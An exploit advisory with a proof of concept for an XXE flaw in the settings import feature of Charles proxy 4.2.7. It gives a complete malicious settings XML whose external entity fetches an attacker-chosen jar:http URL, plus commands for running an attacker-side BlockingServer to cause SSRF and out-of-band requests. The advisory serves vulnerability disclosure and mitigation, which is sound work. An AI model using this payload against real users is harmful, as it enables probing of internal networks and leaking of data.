Charles 4.2.7 XML External Entity
Software Link:https://www.charlesproxy.com
Date:11.12.2018
Exploit Author:CK01
Version:<=4.2.7
Date:11.12.2018
Exploit Author:CK01
Version:<=4.2.7
Security Issue:
An XML External Entity (XXE) vulnerability exists in the Charles import/export settings feature. The importer parses the supplied settings file with DOCTYPE and external-entity resolution enabled, so if a user imports an attacker-supplied "Charles Settings.xml", the entity is resolved during the import and the victim's Charles instance makes an outbound request to an attacker-chosen URL. This lets the attacker probe the victim's internal network from the victim's machine (SSRF) and may leak information out of band. Mitigation: the importer should configure its XML parser to reject DOCTYPE declarations and never resolve external entities; users should import settings files only from trusted sources.
POC:
1. Malicious Charles Settings.xml (in this demo the entity points at 127.0.0.1:2014; replace it with the attacker's server). The only exploit-relevant parts are the DOCTYPE that declares the external entity and the `&file;` reference inside `<currentDirectory>`; the rest is an ordinary exported settings document.
<?xml version='1.0' encoding='UTF-8' ?>
<?charles serialisation-version='2.0' ?>
<!--
  XXE trigger. The internal DTD subset declares an external (SYSTEM) entity
  whose system identifier is a jar: URL. When the importer's parser resolves
  the entity, Java's jar: protocol handler fetches http://127.0.0.1:2014/
  from the victim's machine and caches the response in a temporary file
  (see step 4 below, jar_cache*.tmp). 127.0.0.1:2014 is a placeholder for
  the attacker-controlled host running BlockingServer.
  A hardened importer would reject this DOCTYPE before parsing the body.
-->
<!DOCTYPE data [
<!ENTITY file SYSTEM "jar:http://127.0.0.1:2014/!/">]>
<!--
  Everything from here on is a normal Charles settings export; only the
  <currentDirectory> element in <startupConfiguration> references the entity.
-->
<charles-export>
<proxyConfiguration>
<enableSOCKSProxy>false</enableSOCKSProxy>
<dynamicHTTPPort>false</dynamicHTTPPort>
<dynamicSOCKSPort>false</dynamicSOCKSPort>
<enableSOCKSTransparentHTTPProxying>true</enableSOCKSTransparentHTTPProxying>
<port>8888</port>
<SOCKSPort>8889</SOCKSPort>
<decryptSSL>true</decryptSSL>
<transparentProxy>false</transparentProxy>
<preferIPv6addresses>false</preferIPv6addresses>
<sslLocations>
<locationPatterns>
<locationMatch>
<location>
<host>*</host>
<port>443</port>
</location>
<enabled>true</enabled>
</locationMatch>
</locationPatterns>
</sslLocations>
<defaultSOCKSTransparentHTTPProxyPorts>true</defaultSOCKSTransparentHTTPProxyPorts>
<socksTransparentHTTPProxyPorts/>
<socksTransparentHTTPProxyPortRanges/>
<windowsConfiguration>
<useHTTP>true</useHTTP>
<useSOCKS>false</useSOCKS>
<enableAtStartup>true</enableAtStartup>
</windowsConfiguration>
<macOSXConfiguration>
<useHTTP>true</useHTTP>
<useSOCKS>false</useSOCKS>
<enableAtStartup>false</enableAtStartup>
</macOSXConfiguration>
<mozillaFirefoxConfiguration>
<useHTTP>true</useHTTP>
<useSOCKS>false</useSOCKS>
<enableAtStartup>true</enableAtStartup>
</mozillaFirefoxConfiguration>
</proxyConfiguration>
<recordingConfiguration>
<limit>100</limit>
<maxTransactions>0</maxTransactions>
<maxWebSocketMessages>-1</maxWebSocketMessages>
<ignoreHosts>
<locationPatterns/>
</ignoreHosts>
<recordHosts>
<locationPatterns/>
</recordHosts>
</recordingConfiguration>
<!-- NOTE(review): the IP range and encrypted proxy passwords below are
     leftovers from the machine that produced the export; they play no
     part in the exploit. -->
<accessControlConfiguration>
<warn>true</warn>
<ipRanges>
<ipRange>
<ip>
<int>192</int>
<int>168</int>
<int>2</int>
<int>43</int>
</ip>
<mask>
<int>255</int>
<int>255</int>
<int>255</int>
<int>255</int>
</mask>
</ipRange>
</ipRanges>
</accessControlConfiguration>
<externalProxyConfiguration>
<configurations>
<entry>
<string>socks</string>
<mutableExternalProxyConfiguration>
<active>false</active>
<requiresAuthentication>false</requiresAuthentication>
<port>0</port>
</mutableExternalProxyConfiguration>
</entry>
<entry>
<string>http</string>
<mutableExternalProxyConfiguration>
<active>true</active>
<requiresAuthentication>false</requiresAuthentication>
<host>127.0.0.1</host>
<port>1087</port>
<domain></domain>
<username></username>
<encryptedPassword>2aQ4yHV+W99fhLcoM+aSlQ==</encryptedPassword>
</mutableExternalProxyConfiguration>
</entry>
<entry>
<string>https</string>
<mutableExternalProxyConfiguration>
<active>true</active>
<requiresAuthentication>false</requiresAuthentication>
<host>127.0.0.1</host>
<port>1087</port>
<domain></domain>
<username></username>
<encryptedPassword>X7aDnIieHyR9nVYpOPBpBw==</encryptedPassword>
</mutableExternalProxyConfiguration>
</entry>
</configurations>
<enabled>true</enabled>
<alwaysBypassLocalhost>true</alwaysBypassLocalhost>
</externalProxyConfiguration>
<throttlingConfiguration>
<bandwidthDown>57.6</bandwidthDown>
<bandwidthUp>33.6</bandwidthUp>
<utilisationDown>70</utilisationDown>
<utilisationUp>70</utilisationUp>
<latency>250</latency>
<reliability>100</reliability>
<mtu>576</mtu>
<lowQuality>100</lowQuality>
<highQuality>100</highQuality>
<stability>100</stability>
<customPresets/>
<hosts class="listAdapter">
<list/>
</hosts>
<selectedHosts>false</selectedHosts>
</throttlingConfiguration>
<startupConfiguration>
<newSession>true</newSession>
<throttling>false</throttling>
<checkUpdates>true</checkUpdates>
<maximised>false</maximised>
<fullscreen>false</fullscreen>
<mainWindow>
<x>171</x>
<y>64</y>
<width>1231</width>
<height>770</height>
</mainWindow>
<!--
  Exploit trigger: the entity reference is expanded when the parser reaches
  this element, which is what causes the outbound jar:/HTTP fetch. Any text
  element in the document would do; <currentDirectory> is simply the one the
  author chose.
-->
<currentDirectory>&file;</currentDirectory>
<lastCheckUpdates>2018-11-12 07:40:37.437 UTC</lastCheckUpdates>
</startupConfiguration>
<userInterfaceConfiguration>
<promptToSaveSessions>false</promptToSaveSessions>
<promptToClearSession>false</promptToClearSession>
<showLineNumbers>true</showLineNumbers>
<lineWrap>true</lineWrap>
<autoScroll>true</autoScroll>
<combineHeadersAndBody>true</combineHeadersAndBody>
<combineRequestAndResponse>true</combineRequestAndResponse>
<minimiseToTray>false</minimiseToTray>
<showMemoryUsage>false</showMemoryUsage>
<enableHotkeys>true</enableHotkeys>
<alwaysOnTop>false</alwaysOnTop>
<showTrayIcon>true</showTrayIcon>
<highlightTreeChanges>true</highlightTreeChanges>
<sequenceFocused>false</sequenceFocused>
<sessionNavStructureLayout>0</sessionNavStructureLayout>
<sessionNavSequenceLayout>1</sessionNavSequenceLayout>
<unitsSpeed>0</unitsSpeed>
<unitsTime>0</unitsTime>
<warningsSeen/>
<properties>
<entry>
<string>SessionFrame.splitPlane.dividerLocation.horizontal</string>
<int>300</int>
</entry>
<entry>
<string>RequestResponsePanel.DIVIDER_LOCATON</string>
<int>289</int>
</entry>
<entry>
<string>SummaryPanel.TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
<entry>
<string>ChartPanel.SIZE_TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
<entry>
<string>ChartPanel.TIMELINE_TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
<entry>
<string>ChartPanel.DURATION_TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
<entry>
<string>SessionFrame.splitPlane.dividerLocation.vertical</string>
<int>200</int>
</entry>
<entry>
<string>SessionFrame.navTabs.mode</string>
<string>Structure</string>
</entry>
<entry>
<string>URLEncodedQueryViewer.TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
<entry>
<string>NavigatorJTable.TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
<entry>
<string>ChartPanel.TYPE_TABLE_COLUMN_STATES</string>
<columnStates/>
</entry>
</properties>
</userInterfaceConfiguration>
<toolConfiguration>
<configs>
<entry>
<string>Breakpoints</string>
<breakpoints>
<toolEnabled>false</toolEnabled>
<breakpoints/>
</breakpoints>
</entry>
<entry>
<string>Reverse Proxies</string>
<reverseProxies>
<active>false</active>
<reverseProxies/>
</reverseProxies>
</entry>
<entry>
<string>White List</string>
<whitelist>
<locations>
<locationPatterns/>
</locations>
<toolEnabled>false</toolEnabled>
<useSelectedLocations>false</useSelectedLocations>
<action>0</action>
</whitelist>
</entry>
<entry>
<string>Map Remote</string>
<map>
<toolEnabled>false</toolEnabled>
<mappings/>
</map>
</entry>
<entry>
<string>Port Forwarding</string>
<portForwarding>
<active>false</active>
<portForwardings/>
</portForwarding>
</entry>
<entry>
<string>Viewer Mappings</string>
<viewerMappings>
<toolEnabled>false</toolEnabled>
<mappings/>
</viewerMappings>
</entry>
<entry>
<string>Rewrite</string>
<rewrite>
<toolEnabled>false</toolEnabled>
<debugging>false</debugging>
<sets/>
</rewrite>
</entry>
<entry>
<string>Map Local</string>
<mapLocal>
<toolEnabled>false</toolEnabled>
<mappings/>
</mapLocal>
</entry>
<entry>
<string>Black List</string>
<blacklist>
<locations>
<locationPatterns/>
</locations>
<toolEnabled>false</toolEnabled>
<useSelectedLocations>false</useSelectedLocations>
<action>0</action>
</blacklist>
</entry>
<entry>
<string>Client Process</string>
<selectedHostsTool>
<locations>
<locationPatterns/>
</locations>
<toolEnabled>false</toolEnabled>
<useSelectedLocations>false</useSelectedLocations>
</selectedHostsTool>
</entry>
<entry>
<string>No Caching</string>
<selectedHostsTool>
<locations>
<locationPatterns/>
</locations>
<toolEnabled>false</toolEnabled>
<useSelectedLocations>false</useSelectedLocations>
</selectedHostsTool>
</entry>
<entry>
<string>DNS Spoofing</string>
<dnsSpoofing>
<toolEnabled>false</toolEnabled>
<spoofs/>
</dnsSpoofing>
</entry>
<entry>
<string>Mirror</string>
<mirror>
<locations>
<locationPatterns/>
</locations>
<toolEnabled>false</toolEnabled>
<useSelectedLocations>false</useSelectedLocations>
</mirror>
</entry>
<entry>
<string>Auto Save</string>
<autoSave>
<toolEnabled>false</toolEnabled>
<enableOnStartup>false</enableOnStartup>
<saveLowMem>false</saveLowMem>
<startOnMultiple>false</startOnMultiple>
<savePeriod>0</savePeriod>
</autoSave>
</entry>
<entry>
<string>Block Cookies</string>
<selectedHostsTool>
<locations>
<locationPatterns/>
</locations>
<toolEnabled>false</toolEnabled>
<useSelectedLocations>false</useSelectedLocations>
</selectedHostsTool>
</entry>
</configs>
</toolConfiguration>
<remoteControlConfiguration>
<enabled>false</enabled>
<allowAnonymous>false</allowAnonymous>
<users/>
</remoteControlConfiguration>
<clientSSLCertificatesConfiguration>
<certificates/>
</clientSSLCertificatesConfiguration>
<protobufConfiguration>
<hideUnvaluedFields>true</hideUnvaluedFields>
<cacheDescriptors>true</cacheDescriptors>
<heuristicTTL>300000</heuristicTTL>
<descriptors/>
</protobufConfiguration>
<gistConfiguration>
<publishLimit>10</publishLimit>
<secret>true</secret>
<openGist>true</openGist>
<enterpriseGitHub>false</enterpriseGitHub>
</gistConfiguration>
<focusConfiguration>
<hosts>
<locationPatterns/>
</hosts>
</focusConfiguration>
</charles-export>
2. On the attacker's server, start pwntester's BlockingServer (see references) on port 2014, serving xxe.txt: `java BlockingServer 2014 xxe.txt`. Per the referenced write-up on abusing jar: downloads, the server sends the file body and then keeps the connection open, so the jar: handler's download never completes and its cached copy stays on disk.
3. Contents of xxe.txt on the attacker's server (any recognizable marker text works): `This file comes from the attacker server!`
4. After the victim imports the settings file, a file named jar_cache<random>.tmp appears in the victim's temporary directory containing "This file comes from the attacker server!". This confirms that Charles's XML parser resolved the external entity and fetched the attacker-controlled URL from the victim's machine; the same mechanism can be pointed at internal hosts to probe them.
reference:
http://www.pwntester.com/blog/2013/11/28/abusing-jar-downloads/
https://github.com/pwntester/BlockingServer
https://www.youtube.com/watch?v=eHSNT8vWLfc&feature=youtu.be

